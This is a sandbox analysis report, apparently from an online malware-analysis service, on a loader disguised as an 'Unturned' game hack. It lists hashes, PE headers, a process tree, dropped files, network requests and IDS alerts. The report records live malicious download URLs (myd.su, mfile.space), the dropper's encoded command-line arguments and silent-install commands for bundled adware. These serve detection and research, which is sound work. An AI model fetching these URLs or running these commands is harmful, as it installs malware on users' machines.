File name: | UnturnedHacks.exe |
Full analysis: | https://app.any.run/tasks/109bc6e4-348c-4b43-89e1-94ace1a2f901 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 24, 2019, 22:18:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, PECompact2 compressed |
MD5: | 1CBD0D0C7AE0D69A5EBEEF1E81062B1C |
SHA1: | 70D7D2CC244B736D896A9E1F8057526EAA62EB50 |
SHA256: | DE3DB26B1484C6282A07C2BC2D553A55F57B807FA41BFFFEBC158D9A7BAD353B |
SSDEEP: | 49152:Tcl+6hQy8YfpY6qDfw7zu/cL2xqO5BiSwdcr7NgGb3E+y:TcY6hwYfp5L7K/LkO5B3wdc7DLty |
Extension | Description | Score |
---|---|---|
.exe | Win32 EXE PECompact compressed (v2.x) | 50.1 |
.exe | Win32 EXE PECompact compressed (generic) | 35.2 |
.dll | Win32 Dynamic Link Library (generic) | 5.5 |
.exe | Win32 Executable (generic) | 3.8 |
.exe | Win16/32 Executable Delphi generic | 1.7 |
MachineType: | Intel 386 or later, and compatibles |
---|---|
TimeStamp: | 2019:04:08 17:55:21+02:00 |
PEType: | PE32 |
LinkerVersion: | 2.25 |
CodeSize: | 888320 |
InitializedDataSize: | 1650688 |
UninitializedDataSize: | - |
EntryPoint: | 0xda7f4 |
OSVersion: | 5 |
ImageVersion: | - |
SubsystemVersion: | 5 |
Subsystem: | Windows GUI |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-Apr-2019 15:55:21 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0050 |
Pages in file: | 0x0002 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x000F |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x001A |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000100 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 2 |
Time date stamp: | 08-Apr-2019 15:55:21 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00278000 | 0x0019D600 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99988 |
.rsrc | 0x00279000 | 0x0000B000 | 0x0000AE00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.33088 |
advapi32.dll |
kernel32.dll |
netapi32.dll |
oleaut32.dll |
shell32.dll |
user32.dll |
version.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3456 | "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" | C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe | — | explorer.exe |
User: admin; Integrity Level: MEDIUM; Exit code: 3221226540 | | | | |
3048 | "C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe" | C:\Users\admin\AppData\Local\Temp\UnturnedHacks.exe | | explorer.exe |
User: admin; Integrity Level: HIGH; Exit code: 0 | | | | |
332 | "C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe" TEw9aHR0cDovL215ZC5zdS9kLypOTj1VbnR1cm5lZEhhY2tzLmV4ZSpGRj0xMjUwMCpBUEk9KlNJWkU9MTExNzY5NipNVT1odHRwOi8vbWZpbGUuc3BhY2UvbC8qU1U9TXlEaXNrLnBybyo= | C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe | | UnturnedHacks.exe |
User: admin; Company: MyDisk.Pro; Integrity Level: HIGH; Description: MyDisk.Pro; Version: 1.0.0.0 | | | | |
1240 | "C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe" --silent --install_browser_class=0 --pay_browser_class=0 "--rfr=hp.1:834408,dse.1:811570,vbm.1:811580,pult.1:811580,hp.2:834423,dse.2:811610,vbm.2:811620,pult.2:811620,any:811550,any.2:811590" "--install_callback=http://razornow.info/api_v2/callback/?guid | C:\Users\admin\AppData\Local\Temp\w52e3e2e5bc44.exe | | wWUxRYVNi.exe |
User: admin; Integrity Level: HIGH; Description: sputnik; Exit code: 3221225547; Version: 5.1.0.194 | | | | |
3716 | "C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe" mode=s siteid=15106 campaignid=1 sourceid=106 | C:\Users\admin\AppData\Local\Temp\w283bb2c636d8.exe | | wWUxRYVNi.exe |
User: admin; Company: "My Web Shield"; Integrity Level: HIGH; Description: My Web Shield Installation File; Version: 3.0.0.0 | | | | |
2800 | "C:\Users\admin\Desktop\UnturnedHacks.exe" | C:\Users\admin\Desktop\UnturnedHacks.exe | — | explorer.exe |
User: admin; Company: VimeWin; Integrity Level: MEDIUM; Description: VimeWin; Exit code: 3221226540; Version: 1.0.0.0 | | | | |
3584 | "C:\Users\admin\Desktop\UnturnedHacks.exe" | C:\Users\admin\Desktop\UnturnedHacks.exe | | explorer.exe |
User: admin; Company: VimeWin; Integrity Level: HIGH; Description: VimeWin; Version: 1.0.0.0 | | | | |
2604 | "C:\Windows\System32\regsvr32.exe" /s "C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll" | C:\Windows\System32\regsvr32.exe | | w52e3e2e5bc44.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: HIGH; Description: Microsoft(C) Register Server; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
3696 | "C:\Program Files\My Web Shield\mweshield.exe" /Service | C:\Program Files\My Web Shield\mweshield.exe | — | w283bb2c636d8.exe |
User: admin; Company: "My Web Shield"; Integrity Level: HIGH; Description: My Web Shield Sentinel; Exit code: 0; Version: 3.0.0.0 | | | | |
3156 | "C:\Program Files\My Web Shield\mweshieldup.exe" /Service | C:\Program Files\My Web Shield\mweshieldup.exe | — | w283bb2c636d8.exe |
User: admin; Company: "My Web Shield"; Integrity Level: HIGH; Description: My Web Shield Consolidator; Version: 3.0.0.0 | | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\cookies.sqlite-shm | — | — | — |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\b693-cce2-78a4-f80d\MailRu.ico | — | — | — |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Temp\45e5-dca1-60d1-e028\GoMailRu.ico | — | — | — |
332 | wWUxRYVNi.exe | C:\Users\admin\AppData\Local\Temp\TMP48F9.tmp | — | — | — |
1240 | w52e3e2e5bc44.exe | C:\ProgramData\Mail.Ru\Id | text | 7853DD01A22D556EC4E67A9A601B469F | EE0A9CE336AD917BA931D6D0B57573990A6DB4841CC1C1248BD0AD71E3146E66 |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Sputnik\GoMailRu.ico | image | ED62B573B9FF118E3EC726D78C5A099F | D8AE22194708322B6CA7C8F5686C85D41EAF847A804657ADEEF6ABCAB74B3270 |
3048 | UnturnedHacks.exe | C:\Users\admin\AppData\Local\Temp\MyDiskPro\wWUxRYVNi.exe | executable | 21DDD0E26423B9FA20C27E80362AE065 | 2634CEFA72A4514435DC66FCBE8D0A6B857760E70B8038058B206C6FE0BFB51B |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Favorites\Искать в Интернете.url | text | EB08378217B4A9D27F46FA00527D778B | B0C3586271724BE93C4BA4AF3D9A7DF05462F76B603DD7EF7E5BA4448BB7C244 |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\AppData\Local\Mail.Ru\Tmp\DeferredTasks\metadata | binary | C4C6E98DD42CC8853DF86F284FB97D50 | 31DAB4984A707675868084F10BB8A64CA1ED041251164FBB0D9AED9792A3DA3D |
1240 | w52e3e2e5bc44.exe | C:\Users\admin\Links\Искать в Интернете.url | text | B72245103E7C3A59C85440E20317135D | 75CF82E4581C060A4663B6D249AB3DE840F66E0E97BBABFE5190E86AC1B72AEA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=install&bgn=1&standalone=1&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=ie_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=spparams&raw=--silent%20--install_browser_class%3D0%20--pay_browser_class%3D0%20%22--rfr%3Dhp.1%3A834408%2Cdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590%22%20%22--install_callback%3Dhttp%3A%2F%2Frazornow.info%2Fapi_v2%2Fcallback%2F%3Fguid&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=7&elapsed_time=0&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | http://myd.su/files/advertising/f47d0ad31c4c49061b9e505593e3db98.exe | US | executable | 623 Kb | malicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=fav_gomailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=setup_unit&id=taskbar_mailru&event=done&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=13&elapsed_time=3&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | 204 | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=sp_prep&time=15466&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=19&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
1240 | w52e3e2e5bc44.exe | GET | — | 217.69.139.245:80 | http://mrds.mail.ru/update/2/version.txt?type=spnative_run&id=mrupdater&event=error&error=193&masterid=%7BF87078E8-BC67-4E9E-8BFA-84B0EB6FFFB5%7D&user_id=%7B23631B68-8767-4904-9FC0-C789C1D10BA4%7D&osver=7&osbit=32&osvernum=6.1&ossp=Service%20Pack%201&uac=1&admin=1&ver=5.1.0.194&mailru_guard=0&mailru_updater=0&comp_mem=3583&tool_mem=14&elapsed_time=15&mr_service=0&os=win6.1&tool=sputnik&GUID=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&common_rfr=811550&install_id=%7B89058F17-6404-4726-A244-A2A3EF950E2F%7D&rfr_rules=hp.1%3A834408%2Cdse.1%3A811570%2Chpdse.1%3A811570%2Cvbm.1%3A811580%2Cpult.1%3A811580%2Chp.2%3A834423%2Cdse.2%3A811610%2Chpdse.2%3A811610%2Cvbm.2%3A811620%2Cpult.2%3A811620%2Cany%3A811550%2Cany.2%3A811590 | RU | — | — | suspicious |
332 | wWUxRYVNi.exe | GET | 200 | 104.24.116.68:80 | http://myd.su/d/eyJmaWQiOiIyZjA2NmJmMCIsImtleSI6ImVhYmU2MjQ3NmE0NDg5NCJ9 | US | executable | 1.07 Mb | malicious |
332 | wWUxRYVNi.exe | POST | — | 104.27.161.171:80 | http://mfile.space/l/ | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1240 | w52e3e2e5bc44.exe | 217.69.139.122:443 | conserv.go.mail.ru | Limited liability company Mail.Ru | RU | unknown |
— | — | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.247:443 | xmlbinupdate.mail.ru | Limited liability company Mail.Ru | RU | malicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.245:80 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
332 | wWUxRYVNi.exe | 104.27.161.171:80 | mfile.space | Cloudflare Inc | US | shared |
1240 | w52e3e2e5bc44.exe | 94.100.180.110:443 | mailruupdater.cdnmail.ru | Limited liability company Mail.Ru | RU | suspicious |
1240 | w52e3e2e5bc44.exe | 217.69.139.245:443 | mrds.mail.ru | Limited liability company Mail.Ru | RU | malicious |
332 | wWUxRYVNi.exe | 104.24.116.68:80 | myd.su | Cloudflare Inc | US | shared |
1240 | w52e3e2e5bc44.exe | 217.69.139.110:443 | xtnmailru.cdnmail.ru | Limited liability company Mail.Ru | RU | malicious |
3716 | w283bb2c636d8.exe | 88.208.5.120:80 | mywebshield-ww1.com | DataWeb Global Group B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
mfile.space | | malicious |
myd.su | | malicious |
xmlbinupdate.mail.ru | | shared |
conserv.go.mail.ru | | unknown |
mrds.mail.ru | | suspicious |
mailruupdater.cdnmail.ru | | unknown |
xtnmailru.cdnmail.ru | | unknown |
mywebshield-ww1.com | | malicious |
getmywebshield.org | | unknown |
gosoftdl.mail.ru | | shared |
PID | Process | Class | Message |
---|---|---|---|
332 | wWUxRYVNi.exe | Misc activity | ADWARE [PTsecurity] Win32.SoftPulse.gikv |
— | — | Potentially Bad Traffic | ET DNS Query for .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |
332 | wWUxRYVNi.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
332 | wWUxRYVNi.exe | A Network Trojan was detected | ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) |
332 | wWUxRYVNi.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
332 | wWUxRYVNi.exe | Potentially Bad Traffic | ET POLICY HTTP Request to .su TLD (Soviet Union) Often Malware Related |